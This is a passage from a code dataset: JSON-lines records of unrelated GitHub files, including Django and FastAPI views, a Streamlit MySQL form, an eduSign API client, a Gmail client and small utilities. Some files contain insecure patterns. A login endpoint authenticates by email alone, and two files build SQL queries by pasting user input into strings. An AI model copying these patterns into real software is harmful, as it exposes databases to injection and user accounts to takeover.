parser.add_argument('--result', type=str, help='path of result file', default='/home/hanieh/car/counter.csv')\n\n arguments = parser.parse_args()\n return arguments\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n main(args)","repo_name":"haniehakhavan/car-detection","sub_path":"count cars.py","file_name":"count cars.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11484920302","text":"import re\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom django.http import JsonResponse\n\n# Create your views here.\nfrom django.contrib.auth.models import User\nfrom rest_framework.response import Response\nfrom .serializers import user_serializer,login_serializer,docs_serializer,appointment_serializer\nfrom rest_framework import status\nfrom users.models import *\n\n@api_view(['GET'])\ndef current_users(request):\n users=User.objects.all();\n users_json=user_serializer(users,many=True);\n print(users_json)\n return Response(users_json.data)\n \n \n@api_view(['POST'])\ndef add_users(request):\n 
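# Expects a JSON body like {\"name\": \"alice\", \"email\": \"alice@example.com\"} (illustrative values).\n 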
user=request.data\n print(user)\n if not user:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n # objects.create() already persists the row; no separate save() call is needed\n User.objects.create(username=user['name'],email=user['email'])\n u=User.objects.get(username=user['name'])\n users_json=user_serializer(u,many=False)\n return Response(users_json.data, status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef login_auth(request):\n user=request.data\n try:\n login_user=User.objects.get(email=user['email'])\n except User.DoesNotExist:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n print(login_user)\n u=user_serializer(login_user,many=False)\n return Response(u.data,status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef getDoctors(request):\n docs=doctors.objects.all()\n docs_json=docs_serializer(docs,many=True)\n return Response(docs_json.data,status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef get_appointments(request,id):\n user_appointments=appointments.objects.filter(user=id);\n json=appointment_serializer(user_appointments,many=True);\n print(json)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_appointment(request,id):\n appointment=appointments.objects.get(id=id);\n json=appointment_serializer(appointment,many=False)\n return Response(json.data)\n\n@api_view(['GET'])\ndef get_doctor(request,id):\n doctor=doctors.objects.get(id=id);\n json=docs_serializer(doctor,many=False);\n return Response(json.data)\n\n@api_view(['DELETE'])\ndef delete_appointment(request,id):\n print(id)\n appointments.objects.get(id=id).delete()\n return Response(status=status.HTTP_200_OK)\n\n@api_view(['POST'])\ndef add_appointment(request):\n data=request.data\n app=doctors.objects.get(id=data['doctor_id'])\n u=User.objects.get(id=data['user_id'])\n appointments.objects.create(user=u,doctor=app,time=data['appointment_date'])\n return Response(status=status.HTTP_200_OK)\n \n\n \n \n ","repo_name":"DeepakGonugunta/sdp4","sub_path":"djangorest/one/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4372033058","text":"import streamlit as st\nfrom utils.utils import *\nfrom datetime import time\n\ndef create_form():\n weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n avaiable_codc=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodC FROM Corsi;\"):\n avaiable_codc.append(row[0])\n avaiable_codf=list()\n for row in execute_query(conn=st.session_state[\"connection\"],\n query=\"SELECT CodFisc FROM Istruttore;\"):\n avaiable_codf.append(row[0])\n\n\n with st.form(\"New scheduled lesson\"):\n codf=st.selectbox(label=\"Trainer ID code selection\", options=avaiable_codf)\n cols = st.columns(5)\n with cols[0]:\n codc=st.selectbox(label=\"Course selection\", options=avaiable_codc)\n with cols[1]:\n giorno=st.selectbox(label=\"Course day selection \", options=weekdays)\n with cols[2]:\n orainizio=st.time_input(label=\"Start time selection\", step=300, value=time(hour=8))\n with cols[3]:\n durata=st.number_input(label=\"Course duration\", max_value=60, step=5, min_value=5, value=30)\n with cols[4]:\n sala=st.text_input(label=\"Room number\", max_chars=5, placeholder=\"S****\")\n \n submitted= st.form_submit_button(\"Submit\", type='primary')\n\n if submitted: \n if sala=='': \n st.warning(body=\"Insert the room number first.\")\n else:\n overlaps=execute_query(conn=st.session_state[\"connection\"], \n query=f\"SELECT STR_TO_DATE(OraInizio, 
'%H:%i:%s'), INTERVAL Durata MINUTE) as OraFine FROM Programma WHERE CodC='{codc}' AND Giorno='{giorno}' ORDER BY OraInizio, Durata;\")\n flag=True\n for row in overlaps:\n if not (time_to_seconds(orainizio, durata)<=row[0].total_seconds() or time_to_seconds(orainizio,0)>=row[1].total_seconds()):\n flag=False\n\n if flag==False:\n st.error(body=\"There is at least one other scheduled lesson for the same course that overlaps with the selected time.\")\n else:\n execute_query(conn=st.session_state[\"connection\"],\n query=f\"INSERT INTO Programma (CodFisc, Giorno, OraInizio, Durata, Sala, CodC) VALUES ('{codf}','{giorno}','{orainizio}',{durata},'{sala}','{codc}');\")\n st.success(body=\"Insertion to database successful.\")\n\nif __name__ == \"__main__\":\n st.title(\":green[Add new scheduled lesson for a specific course]\")\n if check_connection() is not False:\n create_form()","repo_name":"erikscolaro/MySQL-streamlit_training_project","sub_path":"pages/5_Add_new_lesson.py","file_name":"5_Add_new_lesson.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4092752056","text":"\nimport os\nimport numpy as np\n\nfrom sverchok.utils.math import inverse, inverse_square, inverse_cubic\n\ndef show_welcome():\n text = r\"\"\"\n\n ________ .___ _________\n / _____/ | | / _____/\n/ \\ ___ | | \\_____ \\ \n\\ \\_\\ \\ | | / \\ nodes for Sverchok\n \\______ / |___| /_______ /\n \\/ \\/ \n initialized.\n\n\"\"\"\n can_paint = os.name in {'posix'}\n\n with_color = \"\\033[1;31m{0}\\033[0m\" if can_paint else \"{0}\"\n for line in text.splitlines():\n print(with_color.format(line))\n\n\ndef register_class_factory_deps(classes, deps=None):\n \"\"\"\n usage\n from sverchok_gis.utils import register_class_factory_deps\n\n classes = [SvSGNImportGeometryLine]\n register, unregister = sverchok.utils.register_class_factory_deps(classes, deps=[gpd])\n\n \"\"\"\n import bpy\n\n if not deps:\n return bpy.utils.register_classes_factory(classes)\n\n\n def register():\n if all(deps):\n _ = [bpy.utils.register_class(c) for c in classes]\n\n def unregister():\n if all(deps):\n _ = [bpy.utils.unregister_class(c) for c in reversed(classes)]\n\n return register, unregister\n\n\n","repo_name":"Marcus-Richmond/sverchok-gis-nodes","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"14127415072","text":"import json\nimport uuid\nfrom pprint import pformat\nfrom urllib.parse import urljoin\n\nimport requests\nfrom flask import current_app, session, url_for\nfrom requests.auth import HTTPBasicAuth\n\nfrom edusign_webapp.utils import get_authn_context\n\n\ndef pretty_print_req(req: requests.PreparedRequest) -> str:\n \"\"\"\n Pretty print `requests.PreparedRequest`, used for logging\n\n :param req: The request to print\n :return: Pretty printed representation of the request\n \"\"\"\n return '{}\\n{}\\r\\n{}\\r\\n\\r\\n{}'.format(\n '-----------START-----------',\n str(req.method) + ' ' + str(req.url),\n '\\r\\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),\n str(req.body)[:100],\n )\n\n\nclass APIClient(object):\n \"\"\"\n Class holding methods to communicate with the Signature Service Integration REST-Service.\n\n Instances of the `edusign_webapp.run.EduSignApp` Flask app have a property `api_client` that is an\n instance of this class.\n \"\"\"\n\n class 
ExpiredCache(Exception):\n \"\"\"\n When the client sends a document to the API to be prepared, the API will keep it\n in its cache for a configurable amount of time (15 minutes by default). Afterwards\n it will be removed.\n If the client tries to create a sign request referencing a document that has been\n removed from the cache, it will obtain an error response. So it uses this exception\n to signal such condition, to indicate that it is necessary to prepare the document\n again before trying to continue with the signing process.\n \"\"\"\n\n pass\n\n def __init__(self, config: dict):\n \"\"\"\n Initialize the client object with configuration gathered by flask.\n We need 3 parameters here:\n\n + The base URL of the signature service / API\n + The profile in the API to use - for which we have credentials (HTTP Basic Auth)\n + The HTTP Basic Auth credentials.\n\n :param config: Dict containing the configuration parameters provided to Flask.\n \"\"\"\n self.api_base_url = config['EDUSIGN_API_BASE_URL']\n self.profile = config['EDUSIGN_API_PROFILE']\n self.basic_auth = HTTPBasicAuth(config['EDUSIGN_API_USERNAME'], config['EDUSIGN_API_PASSWORD'])\n self.config = config\n\n def _post(self, url: str, request_data: dict) -> dict:\n \"\"\"\n Method to POST to the eduSign API, used by all methods of the class\n that POST to it.\n\n :param url: URL to send the POST to\n :param request_data: Dict holding the data to POST.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n requests_session = requests.Session()\n req = requests.Request('POST', url, json=request_data, auth=self.basic_auth)\n prepped = requests_session.prepare_request(req)\n\n current_app.logger.debug(f\"Request sent to the API's {url} method: {pretty_print_req(prepped)}\")\n\n settings = requests_session.merge_environment_settings(prepped.url, {}, None, None, None)\n response = requests_session.send(prepped, **settings)\n current_app.logger.debug(f\"Response from the API's {url} method: {response}\")\n return response.json()\n\n def prepare_document(self, document: dict) -> dict:\n \"\"\"\n Send request to the `prepare` endpoint of the API.\n This API method will prepare a PDF document\n with a PDF signature page containing a visible PDF signature image,\n and keep it cached for 15min by default.\n\n The main pieces of data we have to send to this endpoint are:\n\n * pdfDocument: The PDF document as base64 data.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.signerName.signerAttributes:\n The list of attributes to be used in the signature, given as `{name: }` objects.\n These are attributes released by the SAML IdP, and their name must be in uri format.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.fieldValues.idp:\n The value of this field will appear in the signature image as the \"Authenticated by\" entity.\n We here try to provide the organization name as provided by Shibboleth, and in case it is not\n found, the entityID of the IdP chosen by the user. Note that the client (the flask app)\n will try to identify the user via seamlessaccess.org, and it will record the IdP chosen by\n the user to use it here.\n\n There are other parameters to control the insertion of the signature image in the document,\n which we've just valued as suggested in [1].\n\n The structure of the JSON to send would be something like:\n\n .. 
code:\n {\n \"pdfDocument\": \"JVBERi0xLj...lJUVPRgo=\",\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": {\"signerAttributes\": [ {\"name\" : \"urn:oid:2.16.840.1.113730.3.1.241\"} ]},\n \"fieldValues\": {\"idp\": \"Snake Oil Co\"},\n },\n \"failWhenSignPageFull\": true,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": true,\n },\n }\n\n :param document: Dict holding the PDF (data and metadata) to prepare for signing.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n idp = session['idp']\n if self.config['ENVIRONMENT'] == 'development':\n # This is only to test the app in a development environment.\n idp = self.config['DEBUG_IDP']\n\n if session.get('organizationName', None) is not None:\n idp = session['organizationName']\n\n attrs = [{'name': attr} for attr in self.config['SIGNER_ATTRIBUTES'].keys()]\n current_app.logger.debug(f\"signerAttributes sent to the prepare endpoint: {attrs}\")\n\n doc_data = document['blob']\n if ',' in doc_data:\n doc_data = doc_data.split(',')[1]\n\n request_data = {\n \"pdfDocument\": doc_data,\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": {\"signerAttributes\": attrs},\n \"fieldValues\": {\"idp\": idp},\n },\n \"failWhenSignPageFull\": True,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": True,\n },\n }\n api_url = urljoin(self.api_base_url, f'prepare/{self.profile}')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's prepare endpoint: {pformat(tolog)}\")\n\n return response\n\n def _try_creating_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Send request to the `create` endpoint of the API.\n This API method is used to create a sign request that can then be POSTed\n to the signature service, to initiate the actual signing process.\n\n It will include references to all the already prepared documents that\n need to be signed, kept in the API's cache.\n\n The main pieces of data we have to send to this endpoint are:\n\n + correlationId: A unique identifier for this request to create a sign request.\n\n + signRequesterID: is the SAML entityID of the SAML SP that authenticated the user,\n and who is the requesting entity of the signature operation. 
It has to coincide with\n whatever has been configured in the signature service.\n\n + returnUrl: The URL of the callback endpoint in the client, to which the user\n will be redirected after completing the signature process at the sign service.\n\n + authnRequirements.authnServiceID: entityID of the IdP that will perform the authentication\n for signature.\n\n + authnRequirements.authnContextClassRefs: The AuthnContextClassRef URI(s) that we request\n that the user is authenticated under.\n\n + authnRequirements.requestedSignerAttributes: A list of SAML attributes and values.\n It is necessary to provide values for all attributes previously sent as signerAttributes\n to the `prepare` endpoint.\n\n + tbsDocuments: A list in which each item carries metadata about one of the documents to be signed.\n The metadata is as follows:\n\n + tbsDocuments.N.id: A unique identifier for the document issued by the client.\n\n + tbsDocuments.N.contentReference: This value was in the response from the API to the call\n to the `prepare` endpoint, as `updatedPdfDocumentReference`.\n\n + tbsDocuments.N.mimeType: application/pdf\n\n + tbsDocuments.N.visiblePdfSignatureRequirement: This was also in the response from the API\n to the call to the `prepare` endpoint.\n\n So the structure of the JSON to send would be something like:\n\n {\n \"correlationId\": \"11111111-1111-1111-1111-111111111111\",\n \"signRequesterID\": \"https://example.org/shibboleth\",\n \"returnUrl\": \"https://example.org/callback\",\n \"authnRequirements\": {\n \"authnServiceID\": \"https://idp.example.org/shibboleth\",\n \"authnContextClassRefs\": [ \"http://id.elegnamnden.se/loa/1.0/loa3\" ],\n \"requestedSignerAttributes\": [\n {\n \"name\": \"urn:oid:2.16.840.1.113730.3.1.241\",\n \"value\": \"John Doe\",\n }\n ],\n },\n \"tbsDocuments\": [],\n }\n\n And each item in `tbsDocuments` would have the structure:\n\n {\n \"id\": \"22222222-2222-2222-2222-222222222222\",\n \"contentReference\": \"33333333-3333-3333-3333-333333333333\",\n \"mimeType\": \"application/pdf\",\n \"visiblePdfSignatureRequirement\": { \"...\" },\n }\n\n :param documents: List with (already prepared) documents to include in the sign request.\n :return: Pair of Flask representation of the HTTP response from the API,\n and list of mappings linking the documents' names with the generated ids.\n \"\"\"\n idp = session['idp']\n if self.config['ENVIRONMENT'] == 'development':\n idp = self.config['DEBUG_IDP']\n\n authn_context = get_authn_context(documents)\n\n correlation_id = str(uuid.uuid4())\n return_url = url_for('edusign.sign_service_callback', _external=True, _scheme='https')\n attrs = [{'name': attr, 'value': session[name]} for attr, name in self.config['SIGNER_ATTRIBUTES'].items()]\n\n request_data = {\n \"correlationId\": correlation_id,\n \"signRequesterID\": self.config['SIGN_REQUESTER_ID'],\n \"returnUrl\": return_url,\n \"authnRequirements\": {\n \"authnServiceID\": idp,\n \"authnContextClassRefs\": authn_context,\n \"requestedSignerAttributes\": attrs,\n },\n \"tbsDocuments\": [],\n }\n documents_with_id = []\n for document in documents:\n doc_with_id = {'name': document['name'], 'key': str(document['key'])}\n if add_blob:\n doc_with_id['blob'] = document['blob']\n doc_with_id['size'] = document['size']\n doc_with_id['type'] = document['type']\n documents_with_id.append(doc_with_id)\n request_data['tbsDocuments'].append(\n {\n \"id\": str(document['key']),\n \"contentReference\": document['ref'],\n \"mimeType\": 
document['type'],\n \"visiblePdfSignatureRequirement\": json.loads(document['sign_requirement']),\n }\n )\n api_url = urljoin(self.api_base_url, f'create/{self.profile}')\n\n return self._post(api_url, request_data), documents_with_id\n\n def create_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Use the `_try_creating_sign_request` method to create a sign request\n at the `create` endpoint of the API.\n\n It is possible that the documents referenced in the requests have been cleared from\n the API's cache; in that case, the response from the API will have an error code\n indicating that condition. This method will then raise an `ExpiredCache` exception,\n and it is the responsibility of the calling method to restart the process: Send the\n documents again to be prepared, and then try again to create a sign request.\n\n If successful, this method will return the response with the sign request, to be POSTed\n from the user agent to initiate the actual signing of the document.\n\n :param documents: List with (already prepared) documents to include in the sign request.\n :raises ExpiredCache: When the response from the API indicates that the documents to sign\n have disappeared from the API's cache.\n :return: Data (with the sign request) contained in the response from the API,\n and a list of mappings linking the documents' names with the generated ids (sent to\n the API as tbsDocuments.N.id).\n \"\"\"\n response_data, documents_with_id = self._try_creating_sign_request(documents, add_blob=add_blob)\n\n if (\n 'status' in response_data\n and response_data['status'] == 400\n and 'message' in response_data\n and 'not found in cache' in response_data['message']\n ):\n raise self.ExpiredCache()\n\n if current_app.logger.level == 'DEBUG':\n tolog = response_data.copy()\n tolog['signRequest'] = tolog['signRequest'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's create endpoint: {pformat(tolog)}\")\n\n return response_data, documents_with_id\n\n def process_sign_request(self, sign_response: dict, relay_state: str) -> requests.Response:\n \"\"\"\n This method is meant to be called after the user has completed the signature process, through the\n sign service and the IdP. 
At this point, the documents are signed and kept in the API's cache.\n So here we send a request to the `process` endpoint of the API to retrieve them.\n\n The main pieces of data we have to send to this endpoint are:\n\n + signResponse\n + relayState\n + state\n\n The values for these are all present in the POST that the user agent sends to the callback in the client app\n (whose URL we sent to the `create` endpoint as `returnUrl`), after returning from the sign service and IdP.\n\n The response to this call will contain, in addition to some more metadata, the signed documents, in a list\n `signedDocuments`, where each document includes:\n\n + id: the id of the document, sent to the `create` endpoint as tbsDocuments.N.id;\n + signedContent: The signed document encoded as base64;\n + mimeType: \"application/pdf\"\n\n Send request to the `process` endpoint of the API.\n This API method will process the DSS SignRequest in order to get the signed document.\n\n :param sign_response: signResponse data as returned from the `create` endpoint of the eduSign API.\n :param relay_state: Relay state as returned from the `create` endpoint of the eduSign API.\n :return: Data (containing the signed documents in successful requests) received in the HTTP response\n from the API.\n \"\"\"\n request_data = {\"signResponse\": sign_response, \"relayState\": relay_state, \"state\": {\"id\": relay_state}}\n api_url = urljoin(self.api_base_url, 'process')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's process endpoint: {pformat(tolog)}\")\n\n return response\n","repo_name":"SUNET/edusign-app","sub_path":"backend/src/edusign_webapp/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":16468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"26121963505","text":"__author__ = 'hungtantran'\r\n\r\n\r\nimport httplib2\r\nimport os\r\nimport base64\r\nfrom email.mime.text import MIMEText\r\n\r\nfrom apiclient import discovery\r\nimport oauth2client\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\n\r\nfrom constants_config import Config\r\nimport logger\r\n\r\ntry:\r\n import argparse\r\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n flags = None\r\n\r\n\r\nclass GmailClient(object):\r\n SCOPES = 'https://www.googleapis.com/auth/gmail.modify'\r\n APPLICATION_NAME = 'gmail_client'\r\n\r\n def __init__(self, secret_json, user_id):\r\n self.secret_json = secret_json\r\n self.user_id = user_id\r\n\r\n credentials = self.get_credentials(secret_json)\r\n http = credentials.authorize(httplib2.Http())\r\n self.service = discovery.build('gmail', 'v1', http=http)\r\n\r\n def get_credentials(self, secret_json):\r\n \"\"\"Gets valid user credentials from storage.\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n credential_dir = os.path.join('.credentials')\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir, 'secret.json')\r\n\r\n store = oauth2client.file.Storage(credential_path)\r\n credentials = store.get()\r\n 
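# No valid cached token: run the browser-based OAuth2 consent flow once and cache the result for later runs.\r\n 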
if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(secret_json, GmailClient.SCOPES)\r\n flow.user_agent = GmailClient.APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n return credentials\r\n\r\n def CreateMessage(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Create a message for an email.\r\n\r\n Args:\r\n content: The text of the email message.\r\n subject: The subject of the email message.\r\n toLine: Email address(es) of the receiver.\r\n ccLine: Optional CC email address(es).\r\n bccLine: Optional BCC email address(es).\r\n\r\n Returns:\r\n An object containing a base64url encoded email object.\r\n \"\"\"\r\n message = MIMEText(content)\r\n message['to'] = toLine\r\n\r\n if ccLine is not None:\r\n message['cc'] = ccLine\r\n\r\n if bccLine is not None:\r\n message['bcc'] = bccLine\r\n\r\n message['from'] = Config.gmail_client_userid\r\n message['subject'] = subject\r\n return {'raw': base64.urlsafe_b64encode(message.as_string())}\r\n\r\n def send_mail(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Send an email message.\r\n\r\n Args:\r\n content: The text of the email message.\r\n subject: The subject of the email message.\r\n toLine: Email address(es) of the receiver.\r\n ccLine: Optional CC email address(es).\r\n bccLine: Optional BCC email address(es).\r\n\r\n Returns:\r\n Sent Message.\r\n \"\"\"\r\n try:\r\n logger.Logger.log(logger.LogLevel.INFO, 'Try sending message with subject %s to %s' % (subject, toLine))\r\n message = self.CreateMessage(content, subject, toLine, ccLine, bccLine)\r\n message = (self.service.users().messages().send(userId=self.user_id,\r\n body=message).execute())\r\n logger.Logger.log(logger.LogLevel.INFO, 'Sent message id: %s' % message['id'])\r\n return message\r\n except Exception as e:\r\n logger.Logger.log(logger.LogLevel.ERROR, e)\r\n\r\n\r\n","repo_name":"hungtantran/Findata","sub_path":"Common/gmail_client.py","file_name":"gmail_client.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1373699957","text":"import random\nfrom color import color\nclass RandomColor():\n def __init__(self, screen_array):\n self.screen_array = screen_array\n\n def randomColor(self):\n return color(random.randint(0, 2), random.randint(0, 2), random.randint(0, 2))\n\n def randomColorFill(self, x, y, x2, y2,types='two_ang'):\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = self.randomColor()\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = self.randomColor()\n\n def randomOneColorFill(self, x, y, x2, y2,types='two_ang'):\n random_color = self.randomColor()\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = random_color\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = random_color","repo_name":"lllzebralll/TGL","sub_path":"randomColor.py","file_name":"randomColor.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40057820614","text":"from query_builder import QueryBuilder\nfrom connect_mysql import Conexao\nfrom mysql.connector import Error\n\nclass Inserir(QueryBuilder):\n def __init__(self,table,data):\n 
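# table: name of the target table; data: dict of column -> value pairs consumed by the parent QueryBuilder (assumed interface).\n 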
super().__init__(table,data)\n self.conn = Conexao()\n\n def _sql(self):\n key = self._dados_chave()\n valor = self._dados_valores()\n campos = \",\".join(key)\n valores = \"','\".join(valor)\n sql = \"INSERT INTO \" + self._tabela + \" (\" + campos + \") VALUES ('\" + valores + \"');\"\n\n return sql\n\n def get(self):\n conn = None\n try:\n sql = self._sql()\n conn = self.conn.connection()\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n print(f'{cursor.rowcount} row(s) affected')\n cursor.close()\n except Error as erro:\n print(f'Failed to insert data into the database: {erro}')\n finally:\n if conn is not None and conn.is_connected():\n conn.close()\n print(\"connection closed\")","repo_name":"wellz3280/estudos-python","sub_path":"query_builder/inserir.py","file_name":"inserir.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34022533848","text":"from asgiref.sync import sync_to_async\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db.models import Q\nfrom fastapi import HTTPException, APIRouter, Depends\nfrom typing import Optional\nfrom pydantic import BaseModel\nfrom uuid import UUID\nfrom ix.agents.models import Agent\nfrom ix.api.auth import get_request_user\nfrom ix.api.chains.endpoints import DeletedItem\nfrom ix.api.agents.types import Agent as AgentPydantic, AgentPage\n\n__all__ = [\"router\", \"AgentCreateUpdate\"]\n\n\nrouter = APIRouter()\n\n\nclass AgentCreateUpdate(BaseModel):\n name: str\n alias: str\n purpose: str\n chain_id: UUID\n model: str = \"gpt-4\"\n config: dict = {}\n\n\n@router.post(\"/agents/\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def create_agent(\n agent: AgentCreateUpdate, user: AbstractUser = Depends(get_request_user)\n):\n agent_obj = Agent(user=user, **agent.dict())\n await agent_obj.asave()\n return AgentPydantic.from_orm(agent_obj)\n\n\n@router.get(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def get_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n return AgentPydantic.from_orm(agent)\n\n\n@router.get(\"/agents/\", response_model=AgentPage, tags=[\"Agents\"])\nasync def get_agents(\n search: Optional[str] = None,\n chat_id: Optional[UUID] = None,\n limit: int = 10,\n offset: int = 0,\n user: AbstractUser = Depends(get_request_user),\n):\n query = Agent.objects.filter(is_test=False).order_by(\"alias\")\n query = Agent.filter_owners(user, query)\n if chat_id:\n query = query.filter(chats__id=chat_id)\n if search:\n query = query.filter(Q(name__icontains=search) | Q(alias__icontains=search))\n\n # punting on async implementation of pagination until later\n return await sync_to_async(AgentPage.paginate)(\n output_model=AgentPydantic, queryset=query, limit=limit, offset=offset\n )\n\n\n@router.put(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def update_agent(\n agent_id: str,\n agent: AgentCreateUpdate,\n user: AbstractUser = Depends(get_request_user),\n):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent_obj = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n for attr, value in agent.dict().items():\n setattr(agent_obj, attr, value)\n await 
agent_obj.asave()\n return agent_obj\n\n\n@router.delete(\"/agents/{agent_id}\", response_model=DeletedItem, tags=[\"Agents\"])\nasync def delete_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n await agent.adelete()\n return DeletedItem(id=agent_id)\n","repo_name":"kreneskyp/ix","sub_path":"ix/api/agents/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":809,"dataset":"github-code","pt":"18"} +{"seq_id":"29908103607","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# coding:utf-8\n\nimport numpy as np\nimport cv2 as cv\ntry:\n import cPickle as pickle\nexcept ModuleNotFoundError:\n import _pickle as pickle\nfrom chainer import cuda\nfrom chainer import Variable\n\n\ndef vggparamater(image, gpu, vgg): # image:str(path to image file) gpu:number(gpu-id)\n\n mean = np.array([103.939, 116.779, 123.68])\n img = cv.imread(image).astype(np.float32)\n img -= mean\n img = cv.resize(img, (224, 224)).transpose((2, 0, 1))\n img = img[np.newaxis, :, :, :]\n\n if gpu >= 0:\n cuda.get_device(gpu).use()\n vgg.to_gpu()\n img = cuda.cupy.asarray(img, dtype=np.float32)\n\n pred = vgg(Variable(img), None)\n\n if gpu >= 0:\n pred = cuda.to_cpu(pred.data)\n else:\n pred = pred.data\n\n with open('pca.pickle', mode='rb') as f:\n pca = pickle.load(f, encoding='latin1')\n\n result = pca.transform(pred)\n\n # PCAmean = np.load('PCAmean.npy')\n # PCAeigen = np.load('PCAeigen.npy')\n\n # result = cv2.PCAProject(pred,PCAmean,PCAeigen)\n\n # print np.shape(result)\n return result\n # return pred\n","repo_name":"sugiya-y/StyleTransferWords","sub_path":"arbitrary_image_stylization_word/vggparam.py","file_name":"vggparam.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"26911717909","text":"import torch\nimport cv2\nimport numpy as np\nimport torch.nn.functional as F\nimport os\nimport os.path as osp\n\n_COLORS = np.array(\n [\n 0.000, 0.447, 0.741,\n 0.850, 0.325, 0.098,\n 0.929, 0.694, 0.125,\n 0.494, 0.184, 0.556,\n 0.466, 0.674, 0.188,\n 0.301, 0.745, 0.933,\n 0.635, 0.078, 0.184,\n 0.300, 0.300, 0.300,\n 1.000, 0.667, 0.500,\n 1.000, 1.000, 0.500,\n 0.000, 0.333, 1.000,\n 0.000, 0.667, 1.000,\n 0.000, 1.000, 1.000,\n 0.333, 0.000, 1.000,\n 0.333, 0.333, 1.000,\n 0.333, 0.667, 1.000,\n 0.333, 1.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.667, 0.333, 1.000\n ]\n).astype(np.float32).reshape(-1, 3)\n\ndef get_names_dict(model):\n \"\"\"Recursive walk to get names including path.\"\"\"\n names = {}\n\n def 